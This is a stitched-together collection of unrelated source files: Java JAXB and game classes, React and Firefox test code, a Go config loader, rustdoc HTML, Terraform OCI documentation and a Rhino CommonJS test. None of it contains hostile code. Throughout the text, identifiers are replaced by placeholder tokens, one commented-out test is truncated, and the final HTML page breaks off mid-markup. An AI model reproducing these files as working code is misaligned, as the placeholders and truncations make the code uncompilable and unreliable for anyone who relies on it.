import javax.xml.bind.annotation.XmlType;
import org.w3c.dom.Element;
/**
 * JAXB-generated root element for a WS-Notification (WSN b-2 schema)
 * message. Its content model is a lax wildcard: any DOM elements or
 * JAXB-bound objects are accepted.
 */
@XmlAccessorType(XmlAccessType.FIELD)
@XmlType(name = "", propOrder = {
    "any"
})
@XmlRootElement(name = "<API key>")
public class <API key> {

    @XmlAnyElement(lax = true)
    protected List<Object> any;

    /**
     * Gets the value of the any property.
     *
     * <p>
     * This accessor method returns a reference to the live list,
     * not a snapshot. Therefore any modification you make to the
     * returned list will be present inside the JAXB object.
     * This is why there is not a <CODE>set</CODE> method for the any property.
     *
     * <p>
     * For example, to add a new item, do as follows:
     * <pre>
     *    getAny().add(newItem);
     * </pre>
     *
     *
     * <p>
     * Objects of the following type(s) are allowed in the list
     * {@link Element }
     * {@link Object }
     *
     *
     */
    public List<Object> getAny() {
        if (any == null) {
            any = new ArrayList<Object>();
        }
        return this.any;
    }

}
package org.seedstack.seed.it.internal;
import org.seedstack.seed.ErrorCode;
/**
* Enumerates all IT error codes.
*
* @author adrien.lauer@mpsa.com
*/
public enum ITErrorCode implements ErrorCode {
    // NOTE(review): constant names are redacted in this snapshot; each value
    // identifies one integration-test failure mode surfaced through
    // SeedStack's ErrorCode mechanism.
    <API key>,
    <API key>,
    <API key>,
    <API key>,
    <API key>,
    <API key>,
    <API key>,
    <API key>,
    <API key>, <API key>, <API key>
}
// @flow
import * as React from 'react';
import { Provider } from 'react-redux';
import { render } from 'firefox-profiler/test/fixtures/testing-library';
import { CallTreeSidebar } from '../../components/sidebar/CallTreeSidebar';
import {
<API key>,
<API key>,
<API key>,
} from '../../actions/profile-view';
import { storeWithProfile } from '../fixtures/stores';
import {
<API key>,
<API key>,
} from '../fixtures/profiles/processed-profile';
import type { CallNodePath } from 'firefox-profiler/types';
import { ensureExists } from '../../utils/flow';
import { fireFullClick } from '../fixtures/utils';
describe('CallTreeSidebar', function () {
function <API key>() {
return <API key>(`
A A A A
B B B B
Cjs Cjs H[cat:Layout] H[cat:Layout]
D F I[cat:Idle]
Ejs Ejs
`);
}
function <API key>() {
const result = <API key>(`
A A A
B B B
C[cat:Layout] C[cat:Layout] C[cat:Layout]
D[cat:Layout]
`);
const {
profile,
<API key>: [{ C, D }],
} = result;
const layout = ensureExists(
ensureExists(
profile.meta.categories,
'Expected to find categories.'
).find((category) => category.name === 'Layout'),
'Could not find Layout category.'
);
const [{ frameTable, stackTable }] = profile.threads;
const fakeC = layout.subcategories.length;
layout.subcategories.push('FakeSubCategoryC');
const fakeD = layout.subcategories.length;
layout.subcategories.push('FakeSubCategoryD');
// The frames, funcs, and stacks all share the same indexes with the layout
// of the stacks.
frameTable.subcategory[C] = fakeC;
frameTable.subcategory[D] = fakeD;
stackTable.subcategory[C] = fakeC;
stackTable.subcategory[D] = fakeD;
return result;
}
function setup({ profile, <API key> }) {
const store = storeWithProfile(profile);
const selectNode = (nodePath: CallNodePath) => {
store.dispatch(<API key>(0, nodePath));
};
const invertCallstack = () => store.dispatch(<API key>(true));
const renderResult = render(
<Provider store={store}>
<CallTreeSidebar />
</Provider>
);
return {
renderResult,
store,
funcNamesDict: <API key>[0],
selectNode,
invertCallstack,
};
}
it('matches the snapshots when displaying data about the currently selected node', () => {
const {
selectNode,
funcNamesDict: { A, B, Cjs, D, H, Ejs },
container,
} = setup(<API key>());
expect(container.firstChild).toMatchSnapshot();
// Cjs is a JS node, but has no self time, so we shouldn't see the
// implementation information.
selectNode([A, B, Cjs]);
expect(container.firstChild).toMatchSnapshot();
selectNode([A, B, Cjs, D]);
expect(container.firstChild).toMatchSnapshot();
selectNode([A, B, H]);
expect(container.firstChild).toMatchSnapshot();
selectNode([A, B, Cjs, D, Ejs]);
expect(container.firstChild).toMatchSnapshot();
});
it('matches the snapshots when displaying data about the currently selected node in an inverted tree', () => {
const {
selectNode,
invertCallstack,
funcNamesDict: { A, B, H, Ejs, I },
container,
} = setup(<API key>());
invertCallstack();
expect(container.firstChild).toMatchSnapshot();
selectNode([Ejs]);
expect(container.firstChild).toMatchSnapshot();
selectNode([H]);
expect(container.firstChild).toMatchSnapshot();
selectNode([I, H]);
expect(container.firstChild).toMatchSnapshot();
selectNode([H, B, A]);
expect(container.firstChild).toMatchSnapshot();
});
it("doesn't show implementation breakdowns when self and total time in profile is zero", () => {
const {
dispatch,
queryByText,
getAllByText,
funcNamesDict: { A, B, D },
} = setup(
<API key>(
`
A A A
B B C
D E F
`,
`
A A A
B B B
G I E
`
)
);
dispatch(<API key>(new Set([2])));
dispatch(<API key>(2, [A]));
expect(queryByText(/Implementation/)).not.toBeInTheDocument();
dispatch(<API key>(2, [A, B, D]));
expect(getAllByText(/Implementation/).length).toBeGreaterThan(0);
});
it('can expand subcategories', () => {
const {
selectNode,
container,
queryByText,
getByText,
funcNamesDict: { A, B, C },
} = setup(<API key>());
selectNode([A, B, C]);
expect(queryByText('FakeSubCategoryC')).not.toBeInTheDocument();
const layoutCategory = getByText('Layout');
fireFullClick(layoutCategory);
expect(getByText('FakeSubCategoryC')).toBeInTheDocument();
expect(container.firstChild).toMatchSnapshot();
});
}); |
import { Email, Facebook, Linkedin, Print, Twitter } from '@amsterdam/asc-assets'
import { ShareButton, themeSpacing } from '@amsterdam/asc-ui'
import type { FunctionComponent } from 'react'
import { useCallback } from 'react'
import styled, { css } from 'styled-components'
import getShareUrl from '../../utils/shareUrl'
export interface ShareBarProps {
  // Optional top margin, expressed in theme spacing units.
  topSpacing?: number
}

// Flex container laying out the share buttons horizontally, with a small
// gap between them and an optional theme-based top margin.
const ShareBarContainer = styled.div<ShareBarProps>`
  display: flex;

  ${({ topSpacing }) =>
    topSpacing &&
    css`
      margin-top: ${themeSpacing(topSpacing)};
    `}

  & > * {
    margin-right: 5px;
  }
`
// Renders share buttons (Facebook, Twitter, LinkedIn, email, print) for
// the current page. Extra props (e.g. topSpacing) are forwarded to the
// styled container.
const ShareBar: FunctionComponent<ShareBarProps> = ({ ...otherProps }) => {
  // Resolves a share URL for the given target and opens it; does nothing
  // when getShareUrl returns no link for the target.
  const handlePageShare = useCallback((target) => {
    const link = getShareUrl(target)
    if (link) {
      window.open(link.url, link.target)
    }
  }, [])

  return (
    <ShareBarContainer {...otherProps} data-testid="sharebar">
      <ShareButton
        // @ts-ignore
        type="button"
        onClick={() => handlePageShare('facebook')}
        hoverColor="#3b5999"
        iconSize={30}
        title="Deel op Facebook"
      >
        <Facebook />
      </ShareButton>
      <ShareButton
        // @ts-ignore
        type="button"
        onClick={() => handlePageShare('twitter')}
        hoverColor="#55acee"
        title="Deel op Twitter"
      >
        <Twitter />
      </ShareButton>
      <ShareButton
        // @ts-ignore
        type="button"
        onClick={() => handlePageShare('linkedin')}
        hoverColor="#0077B5"
        title="Deel op LinkedIn"
      >
        <Linkedin />
      </ShareButton>
      <ShareButton
        // @ts-ignore
        type="button"
        onClick={() => handlePageShare('email')}
        title="Deel via email"
      >
        <Email />
      </ShareButton>
      <ShareButton
        // @ts-ignore
        type="button"
        onClick={() => {
          window.print()
        }}
        title="Print deze pagina"
      >
        <Print />
      </ShareButton>
    </ShareBarContainer>
  )
}
export default ShareBar |
import { equals } from 'ramda';
import {
addRole,
removeRole,
<API key>,
<API key>,
<API key>,
} from '../../../services/users';
import {
<API key>,
<API key>,
} from '../../../utils/userUtils';
// Applies the diff between a user's original and edited roles/permissions:
// adds new roles, removes dropped roles, and creates scheduled changes
// (insert/update/delete) for permissions. All service calls run in
// parallel via a single Promise.all.
export default params => {
  const {
    username,
    roles,
    originalRoles,
    additionalRoles,
    permissions,
    originalPermissions,
    <API key>,
  } = params;
  // Roles present originally but no longer selected must be removed.
  const currentRoles = roles.map(role => role.name);
  const removedRoles = originalRoles.filter(
    role => !currentRoles.includes(role.name)
  );
  // Same diff for permissions.
  const currentPermissions = permissions.map(p => p.name);
  const removedPermissions = originalPermissions.filter(
    p => !currentPermissions.includes(p.name)
  );

  return Promise.all(
    [].concat(
      additionalRoles.map(role => addRole(username, role.name)),
      removedRoles.map(role =>
        removeRole(username, role.name, role.data_version)
      ),
      permissions.map(permission => {
        // Skip permissions whose (possibly scheduled) options are
        // unchanged from the original — nothing to update.
        let skip = false;

        originalPermissions.forEach(value => {
          const newOptions = permission.sc
            ? permission.sc.options
            : permission.options;
          const originalOptions = value.sc ? value.sc.options : value.options;

          if (
            value.name === permission.name &&
            equals(newOptions, originalOptions)
          ) {
            skip = true;
          }
        });

        if (skip) {
          // Resolves to undefined inside Promise.all; harmless.
          return;
        }

        // A pending scheduled change that now matches the live options is
        // redundant — delete the scheduled change instead of updating it.
        if (
          permission.sc &&
          equals(permission.options, permission.sc.options)
        ) {
          return <API key>({
            scId: permission.sc.sc_id,
            scDataVersion: permission.sc.sc_data_version,
          });
        }

        // Only carry over the option fields this permission supports.
        const options = {};

        if (<API key>(permission.name)) {
          options.products = permission.sc
            ? permission.sc.options.products
            : permission.options.products;
        }

        if (<API key>(permission.name)) {
          options.actions = permission.sc
            ? permission.sc.options.actions
            : permission.options.actions;
        }

        if (permission.sc) {
          return <API key>({
            username,
            permission: permission.name,
            options,
            dataVersion: permission.data_version,
            scId: permission.sc.sc_id,
            scDataVersion: permission.sc.sc_data_version,
            // Schedule the change slightly in the future.
            when: new Date().getTime() + 5000,
          });
        }

        return <API key>({
          username,
          permission: permission.name,
          options,
          dataVersion: permission.data_version,
          changeType: 'update',
          when: new Date().getTime() + 5000,
        });
      }),
      <API key>.map(permission => {
        const options = {};

        if (<API key>(permission.name)) {
          options.products = permission.options.products;
        }

        if (<API key>(permission.name)) {
          options.actions = permission.options.actions;
        }

        return <API key>({
          username,
          permission: permission.name,
          options,
          changeType: 'insert',
          when: new Date().getTime() + 5000,
        });
      }),
      removedPermissions.map(permission => {
        // A removed permission with a pending scheduled change: drop the
        // scheduled change; otherwise schedule a delete.
        if (permission.sc) {
          return <API key>({
            scId: permission.sc.sc_id,
            scDataVersion: permission.sc.sc_data_version,
          });
        }

        return <API key>({
          username,
          permission: permission.name,
          dataVersion: permission.data_version,
          changeType: 'delete',
          when: new Date().getTime() + 5000,
        });
      })
    )
  );
};
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `XK_minus` constant in crate `x11`.">
<meta name="keywords" content="rust, rustlang, rust-lang, XK_minus">
<title>x11::keysym::XK_minus - Rust</title>
<link rel="stylesheet" type="text/css" href="../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
This old browser is unsupported and will most likely display funky
things.
</div>
    <![endif]-->
<section class="sidebar">
<p class='location'><a href='../index.html'>x11</a>::<wbr><a href='index.html'>keysym</a></p><script>window.sidebarCurrent = {name: 'XK_minus', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script>
</section>
<nav class="sub">
<form class="search-form js-only">
<div class="search-container">
<input class="search-input" name="search"
autocomplete="off"
placeholder="Click or press ‘S’ to search, ‘?’ for more options…"
type="search">
</div>
</form>
</nav>
<section id='main' class="content constant">
<h1 class='fqn'><span class='in-band'><a href='../index.html'>x11</a>::<wbr><a href='index.html'>keysym</a>::<wbr><a class='constant' href=''>XK_minus</a></span><span class='out-of-band'><span id='render-detail'>
<a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs">
[<span class='inner'>−</span>]
</a>
</span><a id='src-1438' class='srclink' href='../../src/x11/keysym.rs.html#188' title='goto source code'>[src]</a></span></h1>
<pre class='rust const'>pub const XK_minus: <a class='type' href='../../libc/types/os/arch/c95/type.c_uint.html' title='libc::types::os::arch::c95::c_uint'>c_uint</a><code> = </code><code>0x02d</code></pre></section>
<section id='search' class="content hidden"></section>
<section class="footer"></section>
<div id="help" class="hidden">
<div>
<div class="shortcuts">
<h1>Keyboard Shortcuts</h1>
<dl>
<dt>?</dt>
<dd>Show this help dialog</dd>
<dt>S</dt>
<dd>Focus the search field</dd>
<dt>⇤</dt>
<dd>Move up in search results</dd>
<dt>⇥</dt>
<dd>Move down in search results</dd>
<dt>⏎</dt>
<dd>Go to active search result</dd>
</dl>
</div>
<div class="infos">
<h1>Search Tricks</h1>
<p>
Prefix searches with a type followed by a colon (e.g.
<code>fn:</code>) to restrict the search to a given type.
</p>
<p>
Accepted types are: <code>fn</code>, <code>mod</code>,
<code>struct</code>, <code>enum</code>,
<code>trait</code>, <code>type</code>, <code>macro</code>,
and <code>const</code>.
</p>
<p>
Search functions by type signature (e.g.
<code>vec -> usize</code>)
</p>
</div>
</div>
</div>
<script>
window.rootPath = "../../";
window.currentCrate = "x11";
window.playgroundUrl = "";
</script>
<script src="../../jquery.js"></script>
<script src="../../main.js"></script>
<script async src="../../search-index.js"></script>
</body>
</html> |
// import { async, ComponentFixture, TestBed } from '@angular/core/testing';
// import { LineChartComponent } from './line-chart.component';
// describe('LineComponent', () => {
// let component: LineChartComponent;
// let fixture: ComponentFixture<LineChartComponent>;
// beforeEach(async(() => {
// TestBed.<API key>({
// declarations: [ LineChartComponent ]
// .compileComponents();
// beforeEach(() => {
// fixture = TestBed.createComponent(LineChartComponent);
// component = fixture.componentInstance;
// fixture.detectChanges();
// it('should be created', () => {
// expect(component).toBeTruthy(); |
package bot
import (
"encoding/json"
"io/ioutil"
"log"
)
// Config is the representation of the dynamic config.json.
type Config struct {
	Admin     string              `json:"admin"`     // bot administrator identifier
	Notifiers map[string][]string `json:"notifiers"` // notifier key -> list of targets
	Debug     bool                `json:"debug"`     // enables debug behaviour
}

// NewConfig returns a new instance of Config whose Notifiers map is already
// allocated, so callers can add entries without a nil-map panic.
func NewConfig() *Config {
	return &Config{
		Notifiers: make(map[string][]string),
	}
}
// fromJSON loads the configuration from the JSON file at filename,
// overwriting any fields present in the document. It returns an error if
// the file cannot be read or does not contain valid JSON.
func (cfg *Config) fromJSON(filename string) error {
	file, err := ioutil.ReadFile(filename)
	if err != nil {
		return err
	}
	// cfg is already a *Config; pass it directly. The original passed &cfg
	// (a **Config), which json.Unmarshal tolerates but is needlessly
	// indirect and non-idiomatic.
	if err = json.Unmarshal(file, cfg); err != nil {
		return err
	}
	log.Println("Loaded config.")
	return nil
}
func (cfg *Config) toJSON(filename string) error {
jsonBytes, err := json.MarshalIndent(cfg, "", " ")
if err != nil {
return err
}
if err = ioutil.WriteFile(filename, jsonBytes, 0600); err != nil {
return err
}
log.Println("Saved config.")
return nil
} |
subcategory: "Database"
layout: "oci"
page_title: "Oracle Cloud Infrastructure: <API key>"
sidebar_current: "<API key>"
description: |-
Provides details about a specific Db Node in Oracle Cloud Infrastructure Database service
# Data Source: <API key>
This data source provides details about a specific Db Node resource in Oracle Cloud Infrastructure Database service.
Gets information about the specified database node.
## Example Usage
```hcl
data "<API key>" "test_db_node" {
	#Required
	db_node_id = var.db_node_id
}
```
## Argument Reference
The following arguments are supported:
* `db_node_id` - (Required) The database node [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
## Attributes Reference
The following attributes are exported:
* `additional_details` - Additional information about the planned maintenance.
* `backup_ip_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup IP address associated with the database node.
**Note:** Applies only to Exadata Cloud Service.
* `backup_vnic2id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the second backup VNIC.
**Note:** Applies only to Exadata Cloud Service.
* `backup_vnic_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the backup VNIC.
* `db_system_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the DB system.
* `fault_domain` - The name of the Fault Domain the instance is contained in.
* `host_ip_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the host IP address associated with the database node.
**Note:** Applies only to Exadata Cloud Service.
* `hostname` - The host name for the database node.
* `id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the database node.
* `maintenance_type` - The type of database node maintenance.
* `<API key>` - The size (in GB) of the block storage volume allocation for the DB system. This attribute applies only for virtual machine DB systems.
* `state` - The current state of the database node.
* `time_created` - The date and time that the database node was created.
* `<API key>` - End date and time of maintenance window.
* `<API key>` - Start date and time of maintenance window.
* `vnic2id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the second VNIC.
**Note:** Applies only to Exadata Cloud Service.
* `vnic_id` - The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VNIC. |
initSidebarItems({"constant":[["BASE_UUID",""],["<API key>",""],["<API key>",""],["<API key>",""],["<API key>",""],["DESCRIPTOR_PREFIX",""],["SERVICE_PREFIX",""],["VALID_UUID_REGEX",""]],"struct":[["BluetoothUUID",""]],"type":[["<API key>",""],["<API key>",""],["<API key>",""],["UUID",""]]}); |
Qwartz
=============
Game made for a game jam at Mozilla Paris. |
package zyx.game.scene.game;
import java.util.ArrayList;
import org.lwjgl.input.Mouse;
import org.lwjgl.util.vector.Vector3f;
import zyx.engine.components.cubemaps.CubemapManager;
import zyx.engine.components.world.WorldObject;
import zyx.engine.curser.CursorManager;
import zyx.engine.curser.GameCursor;
import zyx.engine.scene.loading.WaitingProcess;
import zyx.engine.utils.ScreenSize;
import zyx.engine.utils.worldpicker.ClickedInfo;
import zyx.engine.utils.worldpicker.IWorldPickedItem;
import zyx.game.components.AnimatedMesh;
import zyx.game.components.screen.hud.BaseHud;
import zyx.game.components.screen.hud.DinerHud;
import zyx.game.components.world.interactable.IInteractable;
import zyx.game.components.world.interactable.InteractionAction;
import zyx.game.controls.input.MouseData;
import zyx.game.controls.process.impl.<API key>;
import zyx.game.models.GameModels;
import zyx.game.vo.Gender;
/**
 * Scene for the diner game mode: preloads assets, builds the HUD, tracks
 * scene data, and routes world-picking clicks to the interaction menu.
 *
 * NOTE(review): several method names are redacted in this copy
 * (<API key>); descriptions below are inferred from bodies — confirm
 * against the engine's GameScene contract.
 */
public class DinerScene extends GameScene
{
	// When true the scene requests a networked player from the server on
	// startup; when false a purely local player object is created.
	private static final boolean ONLINE = true;

	public DinerHud dinerHud;
	public DinerSceneData sceneData;

	// Shared pick-callback so the same reference can later be removed again.
	private IWorldPickedItem interactionCallback;

	public DinerScene()
	{
		// Bind the click handler once; add/remove below rely on identity.
		interactionCallback = this::<API key>;
	}

	@Override
	protected void onPreloadResources()
	{
		// Assets needed before the scene becomes interactive.
		preloadResource("mesh.player");
		preloadResource("skybox.texture.desert");
		preloadResource("cubemap.dragon");
	}

	// Scene initialization (name redacted): creates scene data, requests or
	// creates the player, queues cosmetic loading steps, and sets up the world.
	@Override
	protected void <API key>()
	{
		sceneData = new DinerSceneData(this);
		if (ONLINE)
		{
			// Presumably sends a join/login request to the server — confirm.
			<API key>(new <API key>("Zyx", Gender.random()));
		}
		else
		{
			createPlayerObject();
		}
		// Fake loading steps shown while the scene spins up.
		<API key>(new WaitingProcess(3, "Reticulating Splines"));
		<API key>(new WaitingProcess(5, "Branching Family Trees"));
		<API key>(new WaitingProcess(7, "Blurring Reality Lines"));
		world.loadSkybox("skybox.texture.desert");
		CubemapManager.getInstance().load("cubemap.dragon");
		world.setSunRotation(new Vector3f(-33, -5, -21));
		// hud is created by createHud() below, so this cast is safe here.
		dinerHud = (DinerHud) hud;
	}

	@Override
	protected BaseHud createHud()
	{
		return new DinerHud();
	}

	@Override
	public void createPlayerObject()
	{
		super.createPlayerObject();
		// Register the player as an item holder so it can carry items.
		sceneData.holderHandler.addItemHolder(player.getUniqueId(), player);
	}

	// Registers an interactable for world picking (name redacted): selection
	// highlight plus the click callback.
	public void <API key>(IInteractable item)
	{
		addPickedObject(item, GameModels.selection);
		addPickedObject(item, interactionCallback);
	}

	// Unregisters an interactable from world picking (name redacted).
	public void <API key>(IInteractable item)
	{
		removePickedObject(item, GameModels.selection);
		removePickedObject(item, interactionCallback);
	}

	// Pick callback (name redacted): shows a hand cursor over interactables
	// and, on left click, releases the mouse and opens the interaction menu.
	public void <API key>(ClickedInfo info)
	{
		CursorManager.getInstance().setCursor(GameCursor.HAND);
		if (MouseData.data.isLeftClicked())
		{
			// Free the cursor and recentre it before showing UI.
			Mouse.setGrabbed(false);
			Mouse.setCursorPosition(ScreenSize.windowWidth / 2, ScreenSize.windowHeight / 2);
			WorldObject worldObject = info.worldObject;
			if (worldObject instanceof IInteractable)
			{
				IInteractable target = ((IInteractable) worldObject);
				ArrayList<InteractionAction> <API key> = target.getInteractions();
				dinerHud.showInteractions(<API key>);
			}
		}
	}

	@Override
	protected void onUpdate(long timestamp, int elapsedTime)
	{
		super.onUpdate(timestamp, elapsedTime);
		// sceneData is null before init and after dispose.
		if (sceneData != null)
		{
			sceneData.update(timestamp, elapsedTime);
		}
	}

	@Override
	protected void onDispose()
	{
		super.onDispose();
		if (sceneData != null)
		{
			sceneData.dispose();
			sceneData = null;
		}
	}
}
package org.mozilla.javascript.tests.commonjs.module;
import java.io.File;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import org.junit.runner.RunWith;
import org.junit.runners.Parameterized;
import org.mozilla.javascript.Context;
import org.mozilla.javascript.Function;
import org.mozilla.javascript.Scriptable;
import org.mozilla.javascript.ScriptableObject;
import org.mozilla.javascript.commonjs.module.Require;
import org.mozilla.javascript.commonjs.module.provider.<API key>;
import org.mozilla.javascript.commonjs.module.provider.<API key>;
import junit.framework.<API key>;
/**
 * Parameterized CommonJS Modules/1.0 compliance test. Each subdirectory of
 * the 1.0 test-suite directory becomes one test case whose "program" module
 * is executed through Rhino's Require; a script-side print("...", "fail")
 * call fails the case.
 *
 * NOTE(review): some type names are redacted in this copy (<API key>);
 * they are the module provider classes from
 * org.mozilla.javascript.commonjs.module.provider — confirm against imports.
 */
@RunWith(Parameterized.class)
public class ComplianceTest {
    /** Directory holding one compliance test case (its "program" module). */
    private final File testDir;

    public ComplianceTest(String name, File testDir) {
        this.testDir = testDir;
    }

    /**
     * Enumerates the test-case subdirectories: one {name, dir} pair per
     * directory found under the 1.0 suite.
     */
    @Parameterized.Parameters(name = "/{0}")
    public static Collection<Object[]> data() {
        List<Object[]> retval = new ArrayList<Object[]>(16);
        final File suiteDir =
                new File("testsrc/org/mozilla/javascript/tests/commonjs/module/1.0");
        final File[] files = suiteDir.listFiles();
        // File.listFiles() returns null (not an empty array) when the path
        // does not exist or is not a directory; fail with a clear message
        // instead of the opaque NullPointerException the loop would throw.
        if (files == null) {
            throw new IllegalStateException(
                    "Compliance test suite directory not found: "
                            + suiteDir.getAbsolutePath());
        }
        for (File file : files) {
            if (file.isDirectory()) {
                retval.add(new Object[]{file.getName(), file});
            }
        }
        return retval;
    }

    /**
     * Builds a Require rooted at the given test directory, with this class's
     * classpath location as a fallback module path.
     */
    private static Require createRequire(File dir, Context cx, Scriptable scope)
    throws URISyntaxException {
        return new Require(cx, scope, new <API key>(
                new <API key>(
                    Collections.singleton(dir.getAbsoluteFile().toURI()),
                    Collections.singleton(new URI(ComplianceTest.class.getResource(".").toExternalForm() + "/")))),
                null, null, false);
    }

    /** Runs the "program" module of this parameterized case in a fresh Context. */
    @org.junit.Test
    public void testRequire() throws Throwable {
        final Context cx = Context.enter();
        try {
            // Disable interpreter optimizations; run everything interpreted.
            cx.<API key>(-1);
            final Scriptable scope = cx.initStandardObjects();
            ScriptableObject.putProperty(scope, "print", new Print(scope));
            createRequire(testDir, cx, scope).requireMain(cx, "program");
        } finally {
            Context.exit();
        }
    }

    /**
     * Script-visible print(msg[, status]) function: throws (failing the test)
     * when the second argument is "fail", otherwise ignores its arguments.
     */
    private static class Print extends ScriptableObject implements Function {
        Print(Scriptable scope) {
            setPrototype(ScriptableObject.<API key>(scope));
        }

        public Object call(Context cx, Scriptable scope, Scriptable thisObj,
                Object[] args) {
            if (args.length > 1 && "fail".equals(args[1])) {
                throw new <API key>(String.valueOf(args[0]));
            }
            return null;
        }

        public Scriptable construct(Context cx, Scriptable scope, Object[] args) {
            throw new <API key>("Shouldn't be invoked as constructor");
        }

        @Override
        public String getClassName() {
            return "Function";
        }
    }
}
// Lazily import Promise.jsm and Task.jsm (getter name redacted in this copy —
// presumably XPCOMUtils.defineLazyModuleGetter; confirm against the tree).
XPCOMUtils.<API key>(this, "Promise",
  "resource://gre/modules/Promise.jsm");
XPCOMUtils.<API key>(this, "Task",
  "resource://gre/modules/Task.jsm");

// Base URLs for the chrome-packaged test files and their HTTPS-served copies.
const CHROME_BASE = "chrome://mochitests/content/browser/browser/base/content/test/general/";
const HTTPS_BASE = "https://example.com/browser/browser/base/content/test/general/";

// Capture the pre-test values of the prefs this test mutates, so the cleanup
// function below can restore them.
const TELEMETRY_LOG_PREF = "toolkit.telemetry.log.level";
const <API key> = Preferences.get(TELEMETRY_LOG_PREF, null);
const originalReportUrl = Services.prefs.getCharPref("datareporting.healthreport.about.reportUrl");

// Cleanup hook (name redacted — presumably registerCleanupFunction).
<API key>(function() {
  // Ensure we don't pollute prefs for next tests.
  if (<API key>) {
    Preferences.set(TELEMETRY_LOG_PREF, <API key>);
  } else {
    Preferences.reset(TELEMETRY_LOG_PREF);
  }
  try {
    Services.prefs.setCharPref("datareporting.healthreport.about.reportUrl", originalReportUrl);
    Services.prefs.setBoolPref("datareporting.healthreport.uploadEnabled", true);
  } catch (ex) {}
});
// Builds a Date from the given arguments and installs it as the fake "now"
// (Policy.now) in every telemetry module, so pings appear to be created at
// that moment. Returns the Date that was installed.
function fakeTelemetryNow(...args) {
  const date = new Date(...args);
  const scope = {};
  const uris = [
    "resource://gre/modules/TelemetrySession.jsm",
    "resource://gre/modules/<API key>.jsm",
    "resource://gre/modules/TelemetryController.jsm",
  ];
  // Import everything first, then patch each module's clock, mirroring the
  // original two-phase order.
  const modules = uris.map(uri => Cu.import(uri, scope));
  modules.forEach(mod => {
    mod.Policy.now = () => new Date(date);
  });
  return date;
}
// Task generator: loads the shared TEST_PINGS fixture (script name redacted)
// and submits each ping to the telemetry archive with its clock faked to the
// ping's own date. Stores the resulting ping id back onto each fixture entry.
function* setupPingArchive() {
  let scope = {};
  Cu.import("resource://gre/modules/TelemetryController.jsm", scope);
  // Load the fixture script into `scope`, defining scope.TEST_PINGS.
  Cc["@mozilla.org/moz/jssubscript-loader;1"].getService(Ci.<API key>)
    .loadSubScript(CHROME_BASE + "<API key>.js", scope);
  for (let p of scope.TEST_PINGS) {
    // Fake "now" so the archived ping carries the fixture's date.
    fakeTelemetryNow(p.date);
    p.id = yield scope.TelemetryController.submitExternalPing(p.type, p.payload);
  }
}
// Test case table consumed by test() below. Each entry has a description,
// an async setup, and a run(iframe) returning a promise that resolves when
// the in-page test harness reports completion.
var gTests = [
  {
    desc: "Test the remote commands",
    setup: Task.async(function*() {
      // Verbose telemetry logging for easier debugging of failures.
      Preferences.set(TELEMETRY_LOG_PREF, "Trace");
      yield setupPingArchive();
      // Point about:healthreport's remote content at our test page
      // (file name redacted in this copy).
      Preferences.set("datareporting.healthreport.about.reportUrl",
                      HTTPS_BASE + "<API key>.html");
    }),
    run(iframe) {
      let deferred = Promise.defer();
      let results = 0;
      try {
        // The test page posts results via a custom event (name redacted).
        iframe.contentWindow.addEventListener("<API key>", function evtHandler(event) {
          let data = event.detail.data;
          if (data.type == "testResult") {
            ok(data.pass, data.info);
            results++;
          } else if (data.type == "testsComplete") {
            is(results, data.count, "Checking number of results received matches the number of tests that should have run");
            iframe.contentWindow.removeEventListener("<API key>", evtHandler, true);
            deferred.resolve();
          }
        }, true);
      } catch (e) {
        ok(false, "Failed to get all commands");
        deferred.reject();
      }
      return deferred.promise;
    }
  },
]; // gTests
// Mochitest entry point: runs every case in gTests sequentially — setup,
// open about:healthreport in a new tab, run the case against its remote
// iframe, close the tab — then signals completion.
// (The two redacted calls are presumably waitForExplicitFinish() and
// requestLongerTimeout(10) — confirm against the harness.)
function test() {
  <API key>();
  // xxxmpc leaving this here until we resolve bug 854038 and bug 854060
  <API key>(10);
  Task.spawn(function* () {
    for (let testCase of gTests) {
      info(testCase.desc);
      yield testCase.setup();
      // Redacted helper is the tab/iframe loader defined below.
      let iframe = yield <API key>("about:healthreport");
      yield testCase.run(iframe);
      gBrowser.removeCurrentTab();
    }
    finish();
  });
}
// Opens aUrl in a new selected tab and resolves with the page's
// "remote-report" iframe once that iframe has loaded real content
// (name redacted — referenced from test() above).
function <API key>(aUrl, aEventType = "load") {
  let deferred = Promise.defer();
  let tab = gBrowser.selectedTab = gBrowser.addTab(aUrl);
  tab.linkedBrowser.addEventListener(aEventType, function load(event) {
    tab.linkedBrowser.removeEventListener(aEventType, load, true);
    let iframe = tab.linkedBrowser.contentDocument.getElementById("remote-report");
    iframe.addEventListener("load", function frameLoad(e) {
      // Ignore the initial about:blank load and any nested-frame loads;
      // wait for the iframe itself to load its real document.
      if (iframe.contentWindow.location.href == "about:blank" ||
          e.target != iframe) {
        return;
      }
      iframe.removeEventListener("load", frameLoad);
      deferred.resolve(iframe);
    });
  }, true);
  return deferred.promise;
}
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="generator" content="rustdoc">
<meta name="description" content="API documentation for the Rust `VertexAttrib2dv` static in crate `gleam`.">
<meta name="keywords" content="rust, rustlang, rust-lang, VertexAttrib2dv">
<title>gleam::gl::storage::VertexAttrib2dv - Rust</title>
<link rel="stylesheet" type="text/css" href="../../../main.css">
</head>
<body class="rustdoc">
<!--[if lte IE 8]>
<div class="warning">
